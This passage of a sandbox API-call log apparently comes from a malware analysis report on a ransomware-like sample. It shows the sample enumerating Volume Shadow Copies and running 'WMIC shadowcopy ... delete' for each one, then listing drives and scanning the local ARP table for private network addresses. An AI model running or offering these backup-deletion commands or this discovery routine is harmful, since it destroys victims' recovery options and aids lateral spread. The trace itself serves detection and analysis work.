varVal1="{DC780020-7243-4B55-80A9-4BA6EE67823B}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0113.355] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 114 [0113.355] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0113.355] lstrcpyW (in: lpString1=0x18dfe8, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete" [0113.355] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dfa0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df90 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete", lpProcessInformation=0x18df90*(hProcess=0x230, hThread=0x234, dwProcessId=0x348, dwThreadId=0xa6c)) returned 1 [0113.363] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0114.803] CloseHandle (hObject=0x234) returned 1 [0114.803] CloseHandle (hObject=0x230) returned 1 [0114.803] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0114.803] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0114.804] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0114.806] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{3DBBFF70-A67F-4333-8498-31E7BC089E0F}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0114.806] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned 114 [0114.806] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0114.806] lstrcpyW (in: lpString1=0x18dfdc, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete" [0114.806] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18df94*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df84 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete", lpProcessInformation=0x18df84*(hProcess=0x234, hThread=0x230, dwProcessId=0xb5c, dwThreadId=0x3a4)) returned 1 [0114.814] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0116.252] CloseHandle (hObject=0x230) returned 1 [0116.252] CloseHandle (hObject=0x234) returned 1 [0116.252] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0116.252] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0116.252] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0116.255] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{1924CB9A-2919-4442-A6C0-E60362A636CF}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0116.255] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 114 [0116.255] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0116.255] lstrcpyW (in: lpString1=0x18dfd0, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete" [0116.255] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18df88*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df78 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete", lpProcessInformation=0x18df78*(hProcess=0x230, hThread=0x234, dwProcessId=0xa04, dwThreadId=0xaf0)) returned 1 [0116.260] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0119.792] CloseHandle (hObject=0x234) returned 1 [0119.792] CloseHandle (hObject=0x230) returned 1 [0119.792] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0119.792] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0119.792] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0119.793] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{5555A914-627B-4AF5-A342-EC1A6421363A}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0119.793] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 114 [0119.793] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0119.793] lstrcpyW (in: lpString1=0x18dfc4, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete" [0119.793] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18df7c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df6c | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete", lpProcessInformation=0x18df6c*(hProcess=0x234, hThread=0x230, dwProcessId=0x634, dwThreadId=0x68c)) returned 1 [0119.799] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0121.300] CloseHandle (hObject=0x230) returned 1 [0121.300] CloseHandle (hObject=0x234) returned 1 [0121.300] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0121.301] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0121.301] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0121.301] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{C7241040-5C13-409D-A239-55D005C03DE9}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0121.301] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 114 [0121.301] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0121.302] lstrcpyW (in: lpString1=0x18dfb8, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete" [0121.302] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18df70*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df60 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete", lpProcessInformation=0x18df60*(hProcess=0x230, hThread=0x234, dwProcessId=0xb0c, dwThreadId=0x114)) returned 1 [0121.308] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0122.661] CloseHandle (hObject=0x234) returned 1 [0122.661] CloseHandle (hObject=0x230) returned 1 [0122.661] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0122.661] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0122.661] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0122.662] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0122.662] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 114 [0122.662] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0122.662] lstrcpyW (in: lpString1=0x18dfac, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete" [0122.662] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18df64*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df54 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete", lpProcessInformation=0x18df54*(hProcess=0x234, hThread=0x230, dwProcessId=0x71c, dwThreadId=0x8cc)) returned 1 [0122.687] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0124.899] CloseHandle (hObject=0x230) returned 1 [0124.899] CloseHandle (hObject=0x234) returned 1 [0124.899] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0124.899] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0124.899] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0124.900] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0124.900] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned 114 [0124.900] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0124.900] lstrcpyW (in: lpString1=0x18dfa0, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete" [0124.900] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18df58*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df48 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete", lpProcessInformation=0x18df48*(hProcess=0x230, hThread=0x234, dwProcessId=0x87c, dwThreadId=0x748)) returned 1 [0124.906] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0130.451] CloseHandle (hObject=0x234) returned 1 [0130.452] CloseHandle (hObject=0x230) returned 1 [0130.452] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0130.452] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0130.452] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0130.454] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{E369493E-E5B4-449B-8539-770BCA375ABB}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0130.454] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 114 [0130.454] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0130.454] lstrcpyW (in: lpString1=0x18df94, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete" [0130.454] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18df4c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df3c | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete", lpProcessInformation=0x18df3c*(hProcess=0x234, hThread=0x230, dwProcessId=0xa6c, dwThreadId=0xae4)) returned 1 [0130.459] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0132.434] CloseHandle (hObject=0x230) returned 1 [0133.646] CloseHandle (hObject=0x234) returned 1 [0133.646] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0133.646] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0133.646] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x0) returned 0x1 [0133.905] WbemContext:IUnknown:Release (This=0x6b8c688) returned 0x0 [0133.905] WbemLocator:IUnknown:Release (This=0x6b8cfdc) returned 0x0 [0133.906] WbemLocator:IUnknown:Release (This=0x6b80828) returned 0x0 [0133.906] IUnknown:Release (This=0x6b8d07c) returned 0x0 [0133.909] CoUninitialize () [0133.938] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0133.939] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0133.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc) returned 0xedc528 [0133.939] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0xedc528 | out: lpBuffer="C:\\") returned 0x4 [0133.939] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0133.940] lstrlenW (lpString="C:\\") returned 3 [0133.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8be0 [0133.940] lstrlenW (lpString="") returned 0 [0133.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedc528 | out: hHeap=0xea0000) returned 1 [0133.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x28121f0, lpParameter=0x18f2b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1dc [0133.941] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0133.942] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18efc8 | out: lpWSAData=0x18efc8) returned 0 [0133.951] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0133.951] socket (af=2, type=1, protocol=0) returned 0x1cc [0134.851] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0134.851] WSAIoctl (in: s=0x1cc, dwIoControlCode=0xc8000006, lpvInBuffer=0x18f160, cbInBuffer=0x10, lpvOutBuffer=0x2827bb0, cbOutBuffer=0x4, lpcbBytesReturned=0x18f15c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x2827bb0, lpcbBytesReturned=0x18f15c, lpOverlapped=0x0) returned 0 [0134.851] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0134.851] closesocket (s=0x1cc) returned 0 [0134.852] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0134.852] gethostname (in: name=0x18f170, namelen=256 | out: name="XDuwTfOno") returned 0 [0136.050] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0136.051] gethostbyname (name="XDuwTfOno") returned 0x28e4938*(h_name="XDuwTfOno", h_aliases=0x28e4948*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x28e494c*=([0]="192.168.0.2")) [0137.024] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0137.025] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.025] LoadLibraryA (lpLibFileName="Iphlpapi.dll") returned 0x75240000 [0137.026] GetIpNetTable (in: IpNetTable=0x0, SizePointer=0x18ef74, Order=0 | out: IpNetTable=0x0, SizePointer=0x18ef74) returned 0x7a [0137.026] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x18c) returned 0xed76f8 [0137.026] GetIpNetTable (in: IpNetTable=0xed76f8, SizePointer=0x18ef74, Order=0 | out: IpNetTable=0xed76f8, SizePointer=0x18ef74) returned 0x0 [0137.027] inet_ntoa (in=0x160000e0) returned="224.0.0.22" [0137.027] WSAGetLastError () returned 0 [0137.027] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x772f0000 [0137.028] StrStrIA (lpFirst="224.0.0.22", lpSrch="172.") returned 0x0 [0137.028] StrStrIA (lpFirst="224.0.0.22", lpSrch="192.168.") returned 0x0 [0137.028] StrStrIA (lpFirst="224.0.0.22", lpSrch="10.") returned 0x0 [0137.028] StrStrIA (lpFirst="224.0.0.22", lpSrch="169.") returned 0x0 